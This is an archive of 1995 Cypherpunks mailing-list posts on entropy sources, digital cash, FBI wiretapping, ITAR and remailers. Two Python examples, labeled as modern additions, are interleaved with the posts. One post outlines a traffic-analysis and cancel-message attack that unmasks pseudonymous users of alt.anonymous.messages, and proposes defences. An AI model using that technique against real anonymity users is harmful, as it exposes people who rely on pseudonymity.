Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 3 Nov 1995 07:13:18 +0800
To: tcmay@got.net
Subject: Sources of randomness
In-Reply-To: <199511021940.LAA00300@comsec.com>
Message-ID: <9511022143.AA26596@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 2 Nov 1995 00:39:29 -0800
>From: tcmay@got.net (Timothy C. May)

>Digitized video input, especially from something like a noisy channel (t.v.
>channel, for example), is quite likely to produce a lot more entropy bits
>per second than nearly any of us ever need. (One's PGP key could be seeded
>in a fraction of a millisecond, for example.)

My cable feed into my Mac, for example, has surprisingly little noise --
and it's only local noise (stuff only at my house, not available to the
eavesdropper) which counts as entropy.

>  One of the basic ideas we
>have had, as Cypherpunks, is to encourage widespread methods. Any methods
>that need special hardware tend to not get widely used.
>
>Audio, video, disk timing, and all sorts of other sources of physical
>randomness are useful to have, but most people either won't have the right
>configuration or won't configure their systems so as to use their
>configuration.

Most Macs and PCs have audio inputs.  Most of those are mono,
unfortunately.  [The numeric difference between two stereo mics is
especially hard for an eavesdropper-wannabe to predict/compute, assuming
the room isn't silent.]  However, if the eavesdropper doesn't have a mic in
your room, there's still some entropy available on the mono channel.

Meanwhile, my old Sparcstation 1 had an A-D which, when no mic was
connected, gave about 1 bit/second of entropy.  (The newer Sparc here gives
solid 0's with no mic.)

Recorded audio is useless as entropy, of course.


Almost all computers have a mouse and a normal signature, hand-written with
a mouse, has great gobs of noise.  (I'm still working on the little PC
program to measure this -- but preliminary results show a minimum of 1 bit
of noise per mouse sample -- or 200 bits per signature.  Final results may
get higher entropy rates, but I'll wait for the real results before
claiming that.)


+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+
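
Conservative entropy accounting for sampled sources such as the mouse and audio inputs discussed above, as an added example that is not from the original post. It uses the most-common-value min-entropy estimate (a simplified form of the estimator in NIST SP 800-90B) and caps the credit at the post's figure of 1 bit per sample; the sample traces and all names (`noise_symbols`, `SeedPool`, and so on) are constructed for illustration.

```python
import hashlib
import math
import random
from collections import Counter


def min_entropy_per_sample(symbols):
    """Most-common-value estimate of min-entropy, in bits per sample.

    Takes a 99% upper confidence bound on the probability of the most
    frequent symbol, so a short or lopsided run is credited less.
    """
    n = len(symbols)
    if n < 2:
        return 0.0
    p_hat = Counter(symbols).most_common(1)[0][1] / n
    p_upper = min(1.0, p_hat + 2.576 * math.sqrt(p_hat * (1 - p_hat) / (n - 1)))
    return max(0.0, -math.log2(p_upper))


def noise_symbols(coords, bits=2):
    """Strip the predictable motion from a mouse trace.

    The second difference of successive coordinates removes smooth movement;
    only its low `bits` are kept as the candidate noise (an assumption of this
    example, not a measurement method given in the post).
    """
    d1 = [b - a for a, b in zip(coords, coords[1:])]
    d2 = [b - a for a, b in zip(d1, d1[1:])]
    return [d & ((1 << bits) - 1) for d in d2]


class SeedPool:
    """Hash every sample in, but credit only the capped estimate."""

    def __init__(self, target_bits=128, cap_per_sample=1.0):
        self._hash = hashlib.sha256()
        self.target_bits = target_bits
        self.cap_per_sample = cap_per_sample
        self.credited = 0.0

    def add(self, label, symbols):
        # The estimate sees statistics only. It cannot tell whether an
        # eavesdropper holds the same data (a recording, a shared cable feed),
        # so only feed it sources whose noise is local to this machine.
        estimate = min(min_entropy_per_sample(symbols), self.cap_per_sample)
        self._hash.update(repr((label, list(symbols))).encode())
        self.credited += estimate * len(symbols)
        return estimate

    def seed(self):
        if self.credited < self.target_bits:
            raise RuntimeError("not enough credited entropy to release a seed")
        return self._hash.digest()


def constructed_mouse_trace(n=202, seed=1995):
    """Constructed sample: a smooth stroke plus 2 bits of jitter per sample."""
    rng = random.Random(seed)
    return [round(200 * math.sin(i / 30)) + rng.getrandbits(2) for i in range(n)]


def constructed_silent_adc(n=400):
    """Constructed sample: an A-D converter that reads solid zeros."""
    return [0] * n


if __name__ == "__main__":
    pool = SeedPool()
    print("silent ADC bits/sample:", pool.add("adc", constructed_silent_adc()))
    symbols = noise_symbols(constructed_mouse_trace())
    print("mouse raw estimate:", round(min_entropy_per_sample(symbols), 2))
    print("mouse credited bits/sample:", pool.add("mouse", symbols))
    print("total credited bits:", pool.credited)
    print("seed:", pool.seed().hex())
```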






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lvhove&vnet3.vub.ac.be@vnet3.vub.ac.be (Leo Van Hove)
Date: Fri, 3 Nov 1995 00:32:25 +0800
To: cypherpunks@toad.com
Subject: Info needed on observers
Message-ID: <v01530501acbea2598fe2@[134.184.16.171]>
MIME-Version: 1.0
Content-Type: text/plain



                               ////
                              (. .)
___________________________o00-(_)-00o___________________________________

Hi,

I am currently preparing a paper on payment systems for the Internet
and related issues.  I recently found out that so-called observers could
be placed on smart cards (in order to prevent double spending, or even to
prevent people from cheating on taxes...).

To be honest that's about all I know about observers and I am very eager
to find out more.  I am, however, having a hard time finding interesting
references on this subject.

Hence, all suggestions to get me started would be extremely welcome.
Questions of particular interest are: possible functions (and limits),
how 'real' are they already?, what about privacy?, ...

Many thanks in advance.

leo

_________________________________________________________________________
Leo Van Hove

Centre for Financial Economics
Vrije Universiteit Brussel (Free University of Brussels)
Pleinlaan 2
B-1050 Brussels
Vox: +32 629.21.25
Fax: +32 2 629.22.82
e-mail: lvhove@vnet3.vub.ac.be
_________________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 3 Nov 1995 08:07:14 +0800
To: ecm@ai.mit.edu
Subject: Re: e$: 24 Hours
Message-ID: <v02120d00acbeecc5a243@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>     Showed up at the speaker's desk at Infoworld Boston, got
                                         ^^^^^^^^^Internet World Boston
Ack. Spam the planet and then typo the first paragraph.

Sorry.

Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 2 Nov 1995 15:10:25 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Hit-and-Run Anonymous Posts (Re: "Dr." Fred)
In-Reply-To: <acbcfb6801021004664c@[205.199.118.202]>
Message-ID: <199511020706.AA20612@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>Pseudonyms are another matter entirely. Some are classy (Pr0duct Cypher,
>Black Unicorn, Lucky Green), some are oafish (S Boxx), some are ephemeral.
>Persistence of the identity, as when backed by digital signatures, is
>important. (Though not essential, yet.)

You forgot (how could you?!??) BIFF!!!

:)
Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Fri, 3 Nov 1995 10:25:34 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Win95 password caching
Message-ID: <199511030120.RAA06496@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I was under the impression that MS used some variation of DES for encrypting
the password lists (obviously much more secure than the nonsense XOR
encryption used for the screen savers).

Joel

>This was not the question. He wants to prevent local Windows passwords
>from being created for network-only users. This is a serious security
>issue, because if a user enters her real network password for the Windows
>password, and someone else later picks up the .PWL files, which are not
>encrypted in a particularly secure way, then someone can get unauthorized
>access to the network as the previous user(s).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Fri, 3 Nov 1995 01:29:39 +0800
To: cypherpunks@toad.com
Subject: alt.anonymous.messages considered harmful
Message-ID: <199511021625.RAA17800@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


alt.anonymous.messages considered harmful.

The advantage of using an anonymous message pool over using a chained
reply block is, of course, the huge number of potential recipients.
However, there are a number of problems, including a serious attack.
Some of them could be avoided with a slightly different approach.



1. When reading news on a server not under her direct control, Alice
leaks information (article selection, time used per article),
so that she loses the additional security of using a message pool.
She can avoid this by processing alt.anonymous.messages off line.


2. By sending messages of a certain size and number to a pseudonymous
address, an attacker can find out that the pseudonymous user
participates in the pool: The encrypted messages are public;
encryption does not affect size and number of messages.

This information is also available at the alias server. That is not a
problem as such. Anonymity is protected by the size of the pool.

In combination with 1., this attack can lead to disclosure of a
pseudonym.


3. Denial of service attack. If the attacker can delay or suppress
delivery of messages to a subset of the recipients, the pseudonym's
reaction to the message or lack thereof reveals which subset the user
belongs to. He can track down the pseudonym to Alice with O(log(n))
messages.

This is a practical attack, not restricted to a single point of failure
such as the local news server: Persons at well-connected Usenet sites
can send cancel (or superseding) messages with restricted distribution
by use of the Distribution: and Path: lines.

Those who do get the message, can not notice a cancel attack; those
who don't, would have to carefully search for suspicious Supersedes:
lines and monitor the control newsgroup. A denial of service attack by
manipulated Path: header cannot be detected by the victim.



Denial of service attacks could be made somewhat less feasible by
making the pool accessible as a mailing list and via http.
Some problems not related to security (such as restricted availability
and bogus cross-posted traffic in the newsgroup) could also be solved
by reproducing the encrypted posts to alt.anonymous.messages in a
mailing list.

Identification of encrypted messages as needed for 2. and helpful for
3. can be prevented by using a fixed-size message format and inserting
cover messages.

If these messages are numbered and signed by the alias server, users
can detect denial of service attacks (but not distinguish them from
network errors) and try to get the messages through another channel.

For perfect security, however, feedback from all participants would be
required during transmission of the message. This is hardly possible.
So, for highest security return addresses, an "everyone a remailer"
mix net might be the better solution.
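
The mitigations proposed in the post above (fixed-size entries with cover messages, entries numbered and signed by the alias server, and a second channel for fetching what one channel withheld), sketched as an added example that is not part of the original post. All names (`seal`, `audit_feed`, `reconcile`, `SERVER_KEY`) and the sample pool are constructed, and HMAC-SHA256 stands in for the server's signature so the block runs on the standard library alone; a real pool needs a public-key signature that readers can verify but not forge.

```python
import hashlib
import hmac
import os
import struct

SLOT = 1024                            # fixed body size of every pool entry
TAG_LEN = 32
ENTRY_LEN = 8 + SLOT + TAG_LEN
SERVER_KEY = b"constructed demo key"   # assumption: stand-in for the server's signing key


def _tag(head, body):
    return hmac.new(SERVER_KEY, head + body, hashlib.sha256).digest()


def seal(seq, ciphertext=b""):
    """Server side: number, pad to SLOT bytes and authenticate one entry.

    The ciphertext is assumed to be already encrypted to its recipient and
    self-delimiting. An empty ciphertext yields a cover message of equal size.
    """
    if len(ciphertext) > SLOT:
        raise ValueError("ciphertext larger than the fixed slot; split it first")
    head = struct.pack(">Q", seq)
    body = ciphertext + os.urandom(SLOT - len(ciphertext))
    return head + body + _tag(head, body)


def open_entry(entry):
    """Reader side: return (seq, body) if size and tag check out, else None."""
    if len(entry) != ENTRY_LEN:
        return None
    head, body, tag = entry[:8], entry[8:8 + SLOT], entry[8 + SLOT:]
    if not hmac.compare_digest(tag, _tag(head, body)):
        return None
    return struct.unpack(">Q", head)[0], body


def audit_feed(entries, last_seen):
    """Check one channel's copy of the pool.

    Returns (accepted {seq: body}, missing [seq], rejected count). A gap only
    says that something was lost, not why: suppression and network error look
    the same. Entries withheld at the tail leave no gap on a single channel.
    """
    accepted, rejected = {}, 0
    for entry in entries:
        opened = open_entry(entry)
        if opened is None:
            rejected += 1
            continue
        seq, body = opened
        if seq > last_seen:
            accepted.setdefault(seq, body)      # duplicates and replays ignored
    top = max(accepted, default=last_seen)
    missing = [s for s in range(last_seen + 1, top + 1) if s not in accepted]
    return accepted, missing, rejected


def reconcile(primary, secondary, last_seen):
    """Merge two channels (say news and mailing list) and report differences."""
    a, _, _ = audit_feed(primary, last_seen)
    b, _, _ = audit_feed(secondary, last_seen)
    merged = {**b, **a}
    top = max(merged, default=last_seen)
    still_missing = [s for s in range(last_seen + 1, top + 1) if s not in merged]
    return merged, sorted(set(b) - set(a)), still_missing


def demo():
    """Constructed pool of six entries; only number 3 carries a real message."""
    pool = [seal(i, b"ciphertext for some pseudonym" if i == 3 else b"")
            for i in range(1, 7)]
    damaged = bytearray(pool[3])                # entry 4, altered in transit
    damaged[100] ^= 1
    news = [pool[0], pool[1], pool[2], bytes(damaged), pool[4]]  # entry 6 never arrives
    _, missing, rejected = audit_feed(news, last_seen=0)
    merged, suppressed, still_missing = reconcile(news, pool, last_seen=0)
    return {"sizes": {len(e) for e in pool}, "missing": missing,
            "rejected": rejected, "merged": merged,
            "suppressed_on_primary": suppressed, "still_missing": still_missing}


if __name__ == "__main__":
    result = demo()
    print({k: v for k, v in result.items() if k != "merged"})
```

Entry 6 shows why the numbering alone is not enough: a withheld tail produces no gap, and only the comparison with the second channel exposes it.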




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 3 Nov 1995 08:33:41 +0800
To: cypherpunks@toad.com
Subject: Re: ecash remailer
In-Reply-To: <9511021209.ZM7820@morgan.com>
Message-ID: <9511022231.AA08841@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>So, refuse to buy their money.
>Demand open systems.

One problem a number of people have reported in DigiCash is disappearing 
money. Several people have reported that if a transfer is misconfigured
the cash can flow out of the wallet, be rejected at the other end and
disappear from the system - i.e. misprinted names on cheques mean lost cash!

This is bad and they report that Digicash did not respond to their
complaints.

	Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 08:06:51 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <9511021924.AA12407@alpha>
Message-ID: <199511022239.RAA06803@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally writes:
> 
> hallam@w3.org writes:
>  > It is a fair point that just because technology has changed the 
>  > nature of the game it should not mean that wiretaps cease to be 
>  > possible.
> 
> I disagree that this is a "fair point".  That wiretaps are possible is
> an accident of design.  Just because that slice of the salami appears
> gone, I see no reason to concede that it can't be re-attached.

Indeed, I have searched both the constitution and my collected works
of Nietzsche and found no reference to the inalienable right of
governments to listen in on any conversations, let alone the 1% of
conversations the FBI wants access to. By the way, I believe the
quantity in question exceeds the quantity tapped by the East German
government at its height -- certainly it does if you take into account
the fact that phones were more scarce there.

Thank you, Louis Freeh, for taking another step towards the police state.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 4 Nov 1995 21:18:59 +0800
To: cypherpunks@toad.com
Subject: Re: FBI seeks huge wiretapping system
Message-ID: <199511030140.RAA05160@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:09 PM 11/2/95 -0500, Phill Hallam wrote:
>On telephone tapping the statement was made that they do not allow 
>unauthorized taps and that technology was making wildcat taps by
>local officials harder. Which makes sense. 

At least for the moment, wildcat taps have become much easier,
since radio-tapping cellular phones is straightforward.

>It is a fair point that just because technology has changed the 
>nature of the game it should not mean that wiretaps cease to be 
>possible.

Back before telephones, you could steam open someone's mail if they
sent it by the government post, but it was a lot harder if they sent it
by private messengers, and they could always send it in some
pre-arranged code.  And you could always hang out under the eaves
of their houses listening for conversations, but they could always
check for themselves or talk while walking down the street.
It's a fair point that just because technology has made it easier for
eavesdroppers and mail-snoops today doesn't mean that private
conversations should cease to be possible, or that we shouldn't be
able to use technology to preserve the security of our papers and effects.

>What is very odd however is the FBI request for $500 million. This is
>a somewhat large quantity of money to say the least. The telephone
>switches are programmable these days, it should be possible to 
>provide tapping at substantially less cost. 

$500 million is a drop in the bucket; they're talking about wedging themselves
into multiple places in the telephone system, taking up to 1 percent of the
capacity (without compensation as near as I can tell), and they want
the ability to do all this without the inconvenience of going out to
telephone wire offices where somebody might ask to see a warrant.

>Mind you the Federal government is not known for tight cost control. 
Indeed :-)

>The NSA reckoned that a DES cracker would cost substantially more than 
>$1 million because the system costs would be much higher than the component
>costs.
.... 
> Anyway the NSA price estimate was "two or more orders of magnitude more in
> cost"

Wiener's design was about two orders of magnitude cheaper than Wayner's
and the DEC guy's designs, which were in turn far cheaper than any previous.
But it's a believable design, and could probably be done within a factor of
two-three of his cost predictions; "system costs" need to include things
like wiretapping equipment to steal and record the data to be cracked,
and government employees to operate it, and bureaucrats and politicians
to tell them what to do and who to target, and lots of real estate for them all.
But to reach two or more orders of magnitude cost increase,
I'd think you'd need a far bigger collection of cracking machines
than Wiener's - perhaps to crack a few hundred keys per day.

Interesting comments on banks' use of DES for authentication rather than
privacy....  of course, if the government wants to tap banks' conversations,
it can generally just demand that the banks tell them the information,
at least for US-based and other cooperative banks.

>If the NSA want a cheap DES cracker they have my number. I'll take 5%
>of the difference between the actual cost and $100 million (their
>estimate of cost) as my fee.

As Rodney Dangerfield said "Well to start with, you gotta throw in
10% for graft and corruption."


#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Fri, 3 Nov 1995 08:58:16 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Cypherpunk recruiting opportunity
Message-ID: <Pine.SOL.3.91.951102172127.15248A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



C-punx,

Considering the amount of "preaching to the choir" that goes on here I 
thought that the following news item might supply a more suitable outlet 
for some of the more evangelical-minded Cypherpunks.  After all, it is 
perfectly clear that the science of cryptography exemplifies some of the 
more exciting applications of otherwise-dry mathematics, and there is 
always a need for "voices of reason" in the councils of those who would 
make the 'Net safe for children.

___________________

Tech Help for Schools

While high-tech education visionaries are issuing apocalyptic warnings 
about the fate of the allegedly backward US school system, a privately 
sponsored group has launched a Peace Corps-style initiative to ease 
schools into the 21st century.

The Massachusetts-based Tech Corps, which recruits volunteers to help 
schools harness computers and telecommunications technology, announced 
last month that it is going national.  The corps, whose chief sponsor is 
the Cellular Telecommunications Industry Association, will hold a 
conference in Washington DC on 30 October where people can learn how to 
start state chapters.  Founded by Gary J. Beach, chief executive officer 
of Computerworld Inc., the corps last year recruited 300 volunteers 
through the magazine Computerworld who have been working in 12 school 
districts throughout Massachusetts.

Karen Smith, Tech Corps' national director, says the response to the call 
for volunteers from people in industry, government agencies, and private 
consulting firms, has been "incredible."  They help school districts in 
any way they are asked - such as by installing wiring, training teachers, 
persuading local industry to donate hardware, and helping schools 
construct World Wide Web homepages.

Interested parties can reach Tech Corps' own web page at:

http://www.ustc.org



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 10:00:07 +0800
To: Carl Ellison <cme@tis.com>
Subject: Re: Sources of randomness
In-Reply-To: <9511022143.AA26596@tis.com>
Message-ID: <199511022259.RAA06877@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Carl Ellison writes:
> Almost all computers have a mouse and a normal signature, hand-written with
> a mouse, has great gobs of noise.  (I'm still working on the little PC
> program to measure this -- but preliminary results show a minimum of 1 bit
> of noise per mouse sample -- or 200 bits per signature.  Final results may
> get higher entropy rates, but I'll wait for the real results before
> claiming that.)

I have a brochure from a company that sells RS232 interfaced radiation
monitors for only a couple hundred bucks. The things even come with a
RNG demo program.

(The company is "Aware Electronics")

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 3 Nov 1995 09:38:32 +0800
To: perry@piermont.com
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <199511022239.RAA06803@jekyll.piermont.com>
Message-ID: <9511022308.AA08199@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Indeed, I have searched both the constitution and my collected works
>of Nietzsche and found no reference to the inalienable right of
>governments to listen in on any conversations, let alone the 1% of
>conversations the FBI wants access to. 

Nietzsche is not a recognised authority on the US constitution nor
are his works on ethical systems particularly definitive. At best he
points out the deficiencies in the ethical systems of Kant and hints
at a limitation of reasoned approaches to ethics. His ethics of
Will are hardly a fully finished system of ethics. If you want a 
contemporary system of ethics you would find Rorty, Habermas or
Singer a far better choice.

Even within the Nietzschean system of ethics it is very clear that 
listening in on the telephone conversations of "the botched and the
bungled" would lie well within the rights of super-man. Indeed he
is very explicit that there is no logical need for these people to
have rights of any sort. Their lives are at the disposal of the great
leader.

The justification the NSA relies upon is the fact of a Federal law 
that makes it lawful to conduct wiretaps. I think the FBI have gone 
off into gaga land with the magnitude of their request. This is a good
thing. They are not likely to get anything as a result. 


	Phill









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony266@vabeach.email.net
Date: Fri, 3 Nov 1995 09:48:16 +0800
To: cypherpunks@toad.com
Subject: What!!!
Message-ID: <9511021825.S84530450@vabeach.email.net>
MIME-Version: 1.0
Content-Type: text/plain


Can someone tell me this cypherpunks is all about???




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 10:40:14 +0800
To: hallam@w3.org
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <9511022308.AA08199@zorch.w3.org>
Message-ID: <199511022333.SAA06934@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> >Indeed, I have searched both the constitution and my collected works
> >of Nietzsche and found no reference to the inalienable right of
> >governments to listen in on any conversations, let alone the 1% of
> >conversations the FBI wants access to. 
> 
> Nietzsche is not a recognised authority on the US constitution nor
> are his works on ethical systems particularly definitive.

I was being facetious. The point is that the government has no
inherent right to tap our phones -- indeed, it didn't do so for nearly
the first 200 years of our existence, and we did just fine -- better,
in fact. Who among us has felt SAFER since they gained the ability?
Has anyone been feeling more and more safe with time, since the more
and more draconian laws granting the government more and more
authority should have been "fixing" things, right?

> Even within the Nietzschean system of ethics it is very clear that 
> listening in on the telephone conversations of "the botched and the
> bungled" would lie well within the rights of super-man. Indeed he
> is very explicit that there is no logical need for these people to
> have rights of any sort. Their lives are at the disposal of the great
> leader.

Actually, that's a complete misinterpretation of Nietzsche, but that's
another story.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 3 Nov 1995 09:47:48 +0800
To: cypherpunks@toad.com
Subject: The ITAR, you don't leave home without it.
Message-ID: <Pine.3.89.9511021819.B29985-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


A funny thought just occurred to me. Michael Froomkin was recently saying
that the wonderful ITAR applies to American citizens regardless of country
of location. Wouldn't this inane technicality apply to David Chaum in 
Holland? He is American, right? Ever get any problems at US customs David?
The Digicash trial software certainly had crypto in it. I don't remember 
any export controls.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 6 Nov 1995 05:20:06 +0800
To: cypherpunks@toad.com
Subject: Meeting: Nov. 4 in Austin, TX
Message-ID: <199511030104.TAA09845@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

A reminder to those in the central Texas area on Saturday (Nov. 4, 1995)
from 6-8pm. The Austin chapter will be meeting at Ted's Greek Restaurant on
the 400 block of Congress (next to Oscar Snowden's).

We will be trying to wrest control of the last couple of tables in the rear.

Issues we will be discussing:

     *  Further interests of the members and forming working groups.

     *  Make further arrangements to start doing PGP key signing services
        at the end of the monthly EFF meeting.

     *  Discuss doing a 1-hour video on the basic ideas and issues of
        cryptography and current society.

     *  Invitation from CT-LUG to come to their next build-up which is
        scheduled for Nov. 18 but is tentative for now. If all works well
        this may be an opportunity to play with some re-mailer software
        under Linux.

Hope to see some of you there!

                                              Jim Choate
                                              ravage@einstein.ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 3 Nov 1995 09:51:49 +0800
To: Laurent Demailly <cypherpunks@toad.com
Subject: Re: ecash remailer
In-Reply-To: <9511022349.AA01867@hplyot.obspm.fr>
Message-ID: <9511030011.AA09279@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>No. please get first hand facts. I have 'laundered' more than e$18000, by small 
>amounts of a couple of e$, and *no* bucks were lost(1). I

I did, I got a direct report from a person who is extremely well known in
the field of computer networks and security. A second person who is well
known in the UNIX and security areas reported the same problem.

The fact that you can operate the system correctly does not mean that it
does not have bugs. These people were looking to break the system. 

>but hey... if
>your wallet has a hole, or if you throw away your money, you won't
>whine to the ATM, would you ?

Yes, and I would win. Under regulation E of the Federal Reserve code
my liability is limited to $50. The scenario you describe is analogous
to my cash being stuck in the machine.

This is the essential regulatory problem that e-cash faces. Regardless of the
contract disclaimer it is by no means certain what liability Mark Twain have.
The charges are significantly higher than those for credit cards, I see no
validity in the argument that the small fees mean that a small liability 
should be incurred.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 3 Nov 1995 04:15:39 +0800
To: alt.privacy.anon-server@news.news.demon.net
Subject: New Mixmaster Remailer
Message-ID: <Pine.3.89.9511021922.A15602-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



This is the official announcement for the Ecafe Mixmaster Remailer that
has been running on ecafe.org for testing purposes for the last few weeks.
The address to send to is mixmaster@remail.ecafe.org, message reordering
is enabled with a poolsize currently set to two (which may be increased
when we get more traffic), and the key is attached. The remailer is
physically located in the UK.

For more information, check out the Web page at http://www.ecafe.org/~remail/

	Mark

Here is the public key for Ecafe Remailer

=-=-=-=-=-=-=-=-=-=-=-=
ecafe-mix mixmaster@remail.ecafe.org fff0d827161069a26ca44dead777c9ec 2.0.1









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 5 Nov 1995 20:06:04 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <199511022239.RAA06803@jekyll.piermont.com>
Message-ID: <199511030019.TAA19297@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Today's (11/2) NYT carries a Markoff story on The 1% Solution at the top 
left of the front page. The article mentions that the DT appropriation has 
been cut out of the current budget bill (last week ?). It points out that 
since the White House officially plans to veto the current bill anyway, 
they're unlikely to waste too much effort on sticking things into it.

Supposedly they want three zones of wiretap capability: (roughly) 1% in 
cities, 0.5% in suburbs, 0.25% in the country.

We've discussed the grave concern that digital equipment makes everything
much easier to handle. I would like to know what sort of technological 
assurances we could possibly obtain that the arbitrary 1%/0.5%/0.25% figures
couldn't trivially be bumped up to, say, 10%/5%/2.5% with a little bit of
programming. Is this a legitimate worry ?  If the FBI gets its way on this,
how far will we be from the day when 1% is merely a parameter in a wiretap
control program ?  

I don't know enough about telephone switches etc. (digital or otherwise) to
know whether this is just idle speculation.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 02:58:28 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
Message-ID: <199511030524.VAA03406@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A couple of weeks ago, Michael Froomkin <froomkin@law.miami.edu> wrote:
>> > fully applied crypto (e. g. fully anonymous digital cash) 
>> > makes it essentially impossible to base a tax system on income.

>Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
>by people as well as EARNED by people.  Most payers have easily 
>detectible physical presence and assets that can easily be attached by 
>regulators.   It will be a cold day before, e.g., my employer agrees not 
>to report my earnings.  And the same is true for most employers in most 
>industries.  

Unfortunately, this is true, at least for people whose employers are
subject to income tax somewhere.  Taxing businesses doesn't make sense
economically - you could collect almost as much money with far less disruption
to the underlying economy by taxing it as wages for workers and
dividend or interest payments to owners* rather than inside the business itself,
substantially reducing the accounting workload of businesses**.
But it's still very attractive to governments, not only as a lever for
implementing social policy and extracting cooperation, but as a critical tool
to force businesses to report wages paid to employees - I don't know if
law.miami.edu is a taxable business, but for most employers, if they don't
report the wages they paid to their employees, but do report all their
revenue, they get taxed on the additional profit, instead of the employee
getting hit with the tax; most people I know who've been paid "under the table"
have been working for small businesses that are also not reporting cash
revenues.

Of course, if a business isn't _spending_ money on employees, but is just
contracting for work performed by an Anguillan corporation, they still have
receipts for expenses, and the financial arrangements between the Anguillan
corporation and any of its US employees aren't really their concern....

>And if it ever stops being true, we'll just get VAT, and VAT inspectors.  
>So the line about death and taxes remains as true as ever, crypto or no.

Value is really hard to measure in a service economy.   Most of my work over
the last N years has been talking to people, typing on keyboards,  
